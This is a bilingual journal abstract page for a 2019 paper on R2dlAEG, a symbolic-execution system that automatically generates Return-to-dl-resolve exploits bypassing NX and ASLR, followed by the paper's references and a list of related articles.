计算机科学 ›› 2019, Vol. 46 ›› Issue (2): 127-132.doi: 10.11896/j.issn.1002-137X.2019.02.020

• 信息安全 • 上一篇    下一篇

基于符号执行的Return-to-dl-resolve利用代码自动生成方法

方皓, 吴礼发, 吴志勇   

  1. 陆军工程大学指挥控制工程学院 南京210000
  • 收稿日期:2018-01-24 出版日期:2019-02-25 发布日期:2019-02-25
  • 通讯作者: 吴礼发(1968-),男,教授,博士生导师,主要研究方向为网络安全,E-mail:wulifa@vip.163.com
  • 作者简介:方 皓(1993-),男,硕士生,主要研究方向为网络空间安全,E-mail:cyyfh@qq.com;吴志勇(1982-),男,博士,副教授,主要研究方向为软件安全。
  • 基金资助:
    本文受国家重点研发计划基金资助项目(2017YFB0802900)资助。

Automatic Return-to-dl-resolve Exploit Generation Method Based on Symbolic Execution

FANG Hao, WU Li-fa, WU Zhi-yong   

  1. Institute of Command and Control Engineering,Army Engineering University of PLA,Nanjing 210000,China
  • Received:2018-01-24 Online:2019-02-25 Published:2019-02-25

摘要: Return-to-dl-resolve是一种可突破复杂防护机制的通用漏洞利用技术,目前主要以手工方式实现,研究人员需要深入分析并理解ELF动态链接原理,泄露并解析任意库函数的地址,拼装攻击载荷,效率非常低。文中提出了一种基于符号执行的Return-to-dl-resolve自动化实现方法,该方法为ELF可执行文件提供符号执行环境,对程序崩溃点的符号状态进行约束,通过约束求解器对约束进行求解,实现了Return-to-dl-resolve利用代码自动生成系统R2dlAEG。实验结果表明,R2dlAEG可快速构造利用代码,并能够在NX和ASLR防护机制同时开启的条件下劫持程序的控制流。

关键词: 安全防护机制, 符号执行, 利用代码, 漏洞利用

Abstract: Return-to-dl-resolve is a general exploit technology to bypass complicated protection mechanism,but the efficiency of manual shell-code’ construction is very low.The thesis studies the core concept of ASLR,NX and Return-to-dl-resolve,and then set up a Return-to-dl-resolve model.The proposed model provides symbolic execution environment for ELF binary program,and generates exploit by constraint solving.It also inplements a control-flow hijacking exploit generation system named R2dlAEG.The experiment results show that R2dlAEG generates exploits in acceptable time,and the exploits can bypass both NX and ASLR.

Key words: Exploit, Exploit code, Security mechanism, Symbolic execution

中图分类号: 

  • TP309
[1]LIU J,SU P R,YANG M,et al.Software and Cyber Security—A Survey[J].Journal of Software,2017,28(7):42-68.(in Chinese)
刘剑,苏普睿,杨珉,等.软件与网络安全研究综述[J].软件学报,2017,28(7):42-68.
[2]BRUMLEY D,POOSANKAM P,SONG D,et al.Automatic Patch-Based Exploit Generation is Possible:Techniques and Implications[C]∥IEEE Symposium on Security & Privacy.2008.
[3]AVGERINOS T,SANG K C,HAO B L T,et al.AEG:Automatic Exploit Generation[J].Internet Society,2011,57(2):74-84.
[4]SANG K C,AVGERINOS T,REBERT A,et al.Unleashing Mayhem on Binary Code[C]∥Security and Privacy.IEEE,2012:380-394.
[5]STEPHENS N,GROSEN J,SALLS C,et al.Driller:Augmenting Fuzzing Through Selective Symbolic Execution[C]∥ Network and Distributed System Security Symposium.2016.
[6]FEDERICO A D,CAMA A,YAN S,et al.How the ELF ruined Christmas[C]∥ Usenix Conference on Security Symposium.USENIX Association,2015:643-658.
[7]SCHWARTZ E J,AVGERINOS T,BRUMLEY D.Q:exploit hardening made easy[C]∥ Usenix Conference on Security.USENIX Association,2011:25.
[8]WANG M,SU P,LI Q,et al.Automatic Polymorphic Exploit Generation for Software Vulnerabilities[M]∥Security and Privacy in Communication Networks.Springer International Publishing,2013:216-233.
[9]王清,张东辉,周浩.Oday安全:软件漏洞分析技术[M].北京:电子工业出版社,2011.
[10]俞甲子.程序员的自我修养[M].北京:电子工业出版社,2009:90-132.
[11]ORACLE.SYMBOLS[EB/OL].
[2017-12-27].https://docs.oracle.com/cd/E26926_01/html/E25910/chapter6-79797.html.
[12]BARTHOLOMEW D.QEMU:a multihost,multitarget emula- tor[M].Belltown Media,2006.
[13]YAN S,WANG R,SALLS C,et al.SOK:(State of) The Art of War:Offensive Techniques in Binary Analysis[C]∥ Security and Privacy.IEEE,2016:138-157.
[14]SHEN L,DAI K,WANG Z Y.The Non-Sequential Instruction Prefetching Based on Basic Blocks[J].Computer Engineering & Science,2003,25(4):94-98.(in Chinese)
沈立,戴葵,王志英.以基本块为单位的非顺序指令预取[J].计算机工程与科学,2003,25(4):94-98.
[15]MOURA L D,BJØRNER N.Z3:An Efficient SMT Solver[M]∥ Tools and Algorithms for the Construction and Analysis of Systems.Springer Berlin Heidelberg,2008:337-340.
[1] 李明磊, 黄晖, 陆余良, 朱凯龙.
SymFuzz:一种复杂路径条件下的漏洞检测技术
SymFuzz:Vulnerability Detection Technology Under Complex Path Conditions
计算机科学, 2021, 48(5): 25-31. https://doi.org/10.11896/jsjkx.200600128
[2] 周晟伊, 曾红卫.
进化算法与符号执行结合的程序复杂度分析方法
Program Complexity Analysis Method Combining Evolutionary Algorithm with Symbolic Execution
计算机科学, 2021, 48(12): 107-116. https://doi.org/10.11896/jsjkx.210200052
[3] 黄钊,黄曙光,邓兆琨,黄晖.
基于SEH的漏洞自动检测与测试用例生成
Automatic Vulnerability Detection and Test Cases Generation Method for Vulnerabilities Caused by SEH
计算机科学, 2019, 46(7): 133-138. https://doi.org/10.11896/j.issn.1002-137X.2019.07.021
[4] 叶志斌,严波.
符号执行研究综述
Survey of Symbolic Execution
计算机科学, 2018, 45(6A): 28-35.
[5] 李航, 臧洌, 甘露.
基于蚁群算法的猜测符号执行的路径搜索
Search of Speculative Symbolic Execution Path Based on Ant Colony Algorithm
计算机科学, 2018, 45(6): 145-150. https://doi.org/10.11896/j.issn.1002-137X.2018.06.025
[6] 张婧,周安民,刘亮,贾鹏,刘露平.
Crash可利用性分析方法研究综述
Review of Crash Exploitability Analysis Methods
计算机科学, 2018, 45(5): 5-14. https://doi.org/10.11896/j.issn.1002-137X.2018.05.002
[7] 邓兆琨, 陆余良, 朱凯龙, 黄晖.
基于符号执行技术的网络程序漏洞检测系统
Symbolic Execution Technology Based Defect Detection System for Network Programs
计算机科学, 2018, 45(11A): 325-329.
[8] 邓维,李兆鹏.
形状分析符号执行引擎中的状态合并
State Merging for Symbolic Execution Engine with Shape Analysis
计算机科学, 2017, 44(2): 209-215. https://doi.org/10.11896/j.issn.1002-137X.2017.02.034
[9] 陈勇,徐超.
基于符号执行和人机交互的自动向量化方法
Symbolic Execution and Human-Machine Interaction Based Auto Vectorization Method
计算机科学, 2016, 43(Z6): 461-466. https://doi.org/10.11896/j.issn.1002-137X.2016.6A.109
[10] 梁家彪,李兆鹏,朱玲,沈咸飞.
支持形状分析的符号执行引擎的设计与实现
Symbolic Execution Engine with Shape Analysis
计算机科学, 2016, 43(3): 193-198. https://doi.org/10.11896/j.issn.1002-137X.2016.03.036
[11] 李华,邢熠,张玉荣.
基于Token选取的OpenStack单一平面网络建模方法
Modeling OpenStack Single Plane Network Based on Token Selection
计算机科学, 2016, 43(11): 66-70. https://doi.org/10.11896/j.issn.1002-137X.2016.11.012
[12] 王志文,黄小龙,王海军,刘烃,俞乐晨.
基于程序切片的测试用例生成系统研究与实现
Program Slicing-guied Test Case Generation System
计算机科学, 2014, 41(9): 71-74. https://doi.org/10.11896/j.issn.1002-137X.2014.09.012
[13] 张亚军,李舟军,廖湘科,蒋瑞成,李海峰.
自动化白盒模糊测试技术研究
Survey of Automated Whitebox Fuzz Testing
计算机科学, 2014, 41(2): 7-10.
[14] 陈翔,顾庆,陈道蓄.
回归测试中测试用例集扩充技术研究进展
Research Advances in Test Suite Augmentation for Regression Testing
计算机科学, 2013, 40(6): 8-15.
[15] 牛伟纳,丁雪峰,刘智,张小松.
基于符号执行的二进制代码漏洞发现
Vulnerability Finding Using Symbolic Execution on Binary Programs
计算机科学, 2013, 40(10): 119-121.
Viewed
Full text


Abstract

Cited

  Shared   
  Discussed   
No Suggested Reading articles found!